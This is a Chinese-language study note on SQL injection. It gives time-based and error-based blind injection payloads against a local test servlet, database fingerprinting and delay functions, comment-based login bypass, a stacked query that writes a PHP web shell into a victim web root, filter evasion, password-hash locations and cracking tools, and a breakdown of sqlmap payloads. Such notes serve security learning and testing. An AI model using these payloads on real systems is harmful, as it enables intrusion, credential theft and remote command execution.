初探SQL注入

1.1注入语句(通过时间注入函数)

数据库名称

localhost:8080/ScriptTest/userServlet?username='union SELECT IF(SUBSTRING(current,1,1)=CHAR(101),BENCHMARK(10000000,ENCODE('sasssG','zcxczx')),null),count(*) FROM (SELECT Database() as current) as tbl;--  password=W

判断该数据库的系统用户名称

localhost:8080/ScriptTest/userServlet?username=' union SELECT IF(SUBSTRING(current,3,1)=CHAR(101),BENCHMARK(10000000,ENCODE('MSG','by 5 seconds')),null),count(*) FROM (SELECT SYSTEM_USER() as current) as tbl;--  password=W

判断该数据库的当前用户

localhost:8080/ScriptTest/userServlet?username=' union SELECT IF(SUBSTRING(current,3,1)=CHAR(101),BENCHMARK(10000000,ENCODE('MSG','by 5 seconds')),null),count(*) FROM (SELECT CURRENT_USER() as current) as tbl;--  password=W

判断该数据库最后一次进行插入操作的事务ID

localhost:8080/ScriptTest/userServlet?username=' union SELECT IF(SUBSTRING(current,3,1)=CHAR(101),BENCHMARK(10000000,ENCODE('MSG','by 5 seconds')),null),count(*) FROM (SELECT last_insert_id() as current) as tbl;--  password=W

判断某数据库下的表名字

localhost:8080/ScriptTest/userServlet?username=' union SELECT IF(SUBSTRING(current,1,1)=CHAR(97),BENCHMARK(10000000,ENCODE('MSG','by 5 seconds')),null),count(*) FROM (SELECT TABLE_NAME as current FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='MYTEST' order by create_time limit 0,1) as tbl;--  password=W

获取各类数据库标示信息

非盲跟踪：

PostgreSQL: SELECT version()

Oracle PL/SQL :  SELECT banner FROM v$version

SELECT banner FROM v$version WHERE rownum=1

Mysql:SELECT version()  SELECT @@version

Microsoft SQL server:SELECT @@version

@@servername:安装SQL server的服务名称

@@language:当前所使用的语言名称

@@spid：当前用户的进程ID

各数据库使用的延迟时间方法

PostgreSQL: select pg_sleep –

Oracle PL/SQL :

BEGIN  DBMS_LOCK.SLEEP(5);  END;

或者   or 1=dbms_pipe.reveive_message(‘RDS’,10)

Mysql:sleep(n)   BENCHMARK(100000,ENCODE(‘HELLO’,’MON’));

Microsoft SQL server:xxx.jsp?uid=22;waitfor delay ‘0:0:5’; --

针对UNION不同数据库的报错信息

基于错误盲注

www.victim/xxx/xxx/aaa.asp?id=12/is_srvrolemember(‘sysadmin’)

函数返回

1 表示用户属于该组

0 用户不属于该组

NULL  该组不存在

所以12/x当x为1则返回正常界面，0则报错，根据于此判断

也可以根据CASE语句进行判断

CASE WHEN 条件 THEN ACTION1 ELSE ACTION2；

MySQL下可利用CASE 或者  IF

SELECT (CASE WHEN (database()='mytest') then 1 else 0 end);

也可利用IF函数

select if(database()='mytes1',1,0);

终止式sql注入（将一部分原有的sql语句注释掉  替换成自己的sql语句，以下是各个数据库注释）

SQL Sever    Oracle     PostgreSQL    -- ,  /*   */

MySQL   --   ,    # ,  /* */

用法：

1. 在被过滤输入空格的的情况下，可使用/**/代理空格

2. 在判定注入点时可以使用注释，若返回之前相同页面则可能存在注入

3. 冒充已知用户SELECT * FROM ADMINISTRATORS WHERE USERNAME=’admin’/*’ AND PASSWORD=’*/ ’‘;  这样只针对后台业务逻辑中存在只查看sql返回结果的ID，通过ID查询信息进入系统。如果后台验证输入与返回值得一致性的话则无法完成。

4. 利用字符串连接方式识别数据库类型

数据库	连接
SQL server	‘a’+’b’=’ab’
MySQL	‘a’ ‘b’=’ab’
Oracle  和  postgreSQL	‘a’||‘b’=’ab’

使用方法则是将注入点的参数拆分

多语句执行

1. Sqlserver6.0后加入了在一个连接句柄上执行多条sql语句的功能。

意味着可以在正常查询语句的后面加入一条update，insert，等语句实现更改权限，添加删除用户等操作。这样的功能一般都是关闭的。

2. 在mysql与web服务器运行在同一服务器上且运行mysql的用户有足够权限，那么上述命令会在web目录下创建一个允许执行任何命令的文件：

http://www.victim.com/search.php?s=test’;SELECT ‘<?php echo shell_exec($_GET["cmd"]);?>' input outfile '/var/www/victim.com/shell.php';--

堆叠查询

有一定局限性，PHP访问postgreSQL时，PHP允许堆叠查询，但访问MYSQL，PHP则不允许。

窃取hash口令破解工具

SQLserve：NGSSQLCrack或者in&Abel

05版本后密码查询在sys.sql_logins视图中。

05之前是在master数据库下sysxlogins表中  由pwdencrypt（）函数生成

MySQL：John the Ripper打上John BigPatch补丁

postgreSQL： 若username为bar  passwod为foo,也允许明文存储密码。

HASH='md5' || MD5('foobar')=md53858f62230ac3c915f300c664312c63f

Oracle:sys.use$表的password列存储数据库账户的哈希口令。dba_users试图指向该表，从11开始哈希口令不再出现dba_users谁中。并存在spare4的列下，默认下，sys.user$存在旧的和新的hash口令针对SHA1 ORACLE最快的是GSAuditor针对DES最快的是Laszlo Thth。以下是常用获取明文命令。

非主流通道

SQL注入获取系统敏感文件

绕过过滤器

1. 对于通过关键字过滤的过滤器可通过变换大小写来实现

2. select master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins whee name ='sa'

sqlmap注入脚本分析

基于时间的盲注

sqlMAP根据时间进行盲注主要对mysql数据库使用如两条下语句

判定数据库名称

SELECT * FROM userinfo WHERE username='illidan' RLIKE (SELECT 2510=IF((ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>64),SLEEP(5),2510)) AND 'vVVl'='vVVl' AND password='198226198484';

判定数据库密码

SELECT * FROM userinfo WHERE username='illidan' RLIKE (SELECT 2136=IF((ORD(MID((SELECT IFNULL(CAST(password AS CHAR),0x20) FROM mytest.userinfo ORDER BY password LIMIT 1,1),1,1))>8),SLEEP(5),2136)) AND 'NdHl'='NdHl' AND password='198226198484';

Sql语句说明

从RLIKE以后的中心开始看起

1. CAST(xxx as 类型)将目标值做成一个数据类型

2. IFNULL(exper1,exper2)函数中如果exper1不为NULL则返回exper1

3. MIDIE截取字符串与subsring类似

4. ORD读出字符的ASCELL码值

5. IF(xx>64,SLEEP(5),2510))在判定其值如果大于64则睡眠5秒,第三个参数是表达式为假的返回的结果。

6. Sqlmap再根据启发式判断其目标值

RLIKE正则表达式匹配可用于代替union连接自定义select语句，没有列数相同的限制。

0x20 空格

union的话需要判定原来sql语句查询出的列数，因为union级联两个查询需要两个查询的列数相同，在union盲注中会经常用到

CAST()和CONVERT() 函数可获取一个类型值，并产生另一个类型值

MID()截断字符串

ORD（获取第一个字符的ASCLL码）